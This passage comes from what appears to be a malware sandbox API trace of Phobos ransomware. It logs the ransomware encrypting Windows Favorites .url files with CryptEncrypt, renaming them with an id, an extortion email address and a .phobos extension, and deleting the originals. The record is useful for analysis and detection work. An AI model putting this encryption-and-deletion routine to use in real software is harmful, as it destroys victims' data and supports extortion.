dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.825] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.825] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.826] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.826] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.826] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x85, lpOverlapped=0x0) returned 1 [0211.827] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90, dwBufLen=0x90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90) returned 1 [0211.827] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x90, lpOverlapped=0x0) returned 1 [0211.828] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.828] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.828] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0211.828] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.828] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0211.828] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.828] CloseHandle (hObject=0xfc) returned 1 [0211.828] CloseHandle (hObject=0xac) returned 1 [0211.828] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url")) returned 1 [0211.829] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.829] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.829] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=133) returned 1 [0211.829] CloseHandle (hObject=0xac) returned 1 [0211.829] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url")) returned 0x20 [0211.830] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.830] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.830] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.830] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.830] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.830] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x85, lpOverlapped=0x0) returned 1 [0211.831] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90, dwBufLen=0x90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90) returned 1 [0211.831] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x90, lpOverlapped=0x0) returned 1 [0211.832] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.832] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.832] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0211.832] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.832] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0211.832] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.832] CloseHandle (hObject=0xac) returned 1 [0211.832] CloseHandle (hObject=0xfc) returned 1 [0211.832] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url")) returned 1 [0211.833] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.833] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.834] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=133) returned 1 [0211.834] CloseHandle (hObject=0xfc) returned 1 [0211.834] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url")) returned 0x20 [0211.834] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.834] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.834] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.835] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.835] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.835] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x85, lpOverlapped=0x0) returned 1 [0211.836] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90, dwBufLen=0x90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90) returned 1 [0211.836] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x90, lpOverlapped=0x0) returned 1 [0211.837] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.837] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.837] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0211.837] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.837] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0211.837] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.837] CloseHandle (hObject=0xfc) returned 1 [0211.837] CloseHandle (hObject=0xac) returned 1 [0211.837] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url")) returned 1 [0211.838] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.838] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=133) returned 1 [0211.838] CloseHandle (hObject=0xac) returned 1 [0211.838] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url")) returned 0x20 [0211.839] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.839] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.839] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.839] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.839] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.840] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x85, lpOverlapped=0x0) returned 1 [0211.841] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90, dwBufLen=0x90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90) returned 1 [0211.841] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x90, lpOverlapped=0x0) returned 1 [0211.841] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.841] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.841] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0211.841] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.841] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0211.842] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.842] CloseHandle (hObject=0xac) returned 1 [0211.842] CloseHandle (hObject=0xfc) returned 1 [0211.842] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url")) returned 1 [0211.843] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.843] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=134) returned 1 [0211.843] CloseHandle (hObject=0xfc) returned 1 [0211.843] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url")) returned 0x20 [0211.844] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.844] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.844] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.845] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.845] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.845] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x86, lpOverlapped=0x0) returned 1 [0211.846] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90, dwBufLen=0x90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90) returned 1 [0211.846] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x90, lpOverlapped=0x0) returned 1 [0211.846] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.846] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.846] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0211.846] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.846] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0211.847] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.847] CloseHandle (hObject=0xfc) returned 1 [0211.847] CloseHandle (hObject=0xac) returned 1 [0211.847] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url")) returned 1 [0211.847] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.849] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=133) returned 1 [0211.849] CloseHandle (hObject=0xac) returned 1 [0211.849] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url")) returned 0x20 [0211.849] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.849] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.849] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.850] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.850] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.850] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x85, lpOverlapped=0x0) returned 1 [0211.851] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90, dwBufLen=0x90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90) returned 1 [0211.851] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x90, lpOverlapped=0x0) returned 1 [0211.851] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.851] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.851] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0211.851] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.852] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0211.852] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.852] CloseHandle (hObject=0xac) returned 1 [0211.852] CloseHandle (hObject=0xfc) returned 1 [0211.852] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url")) returned 1 [0211.853] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn 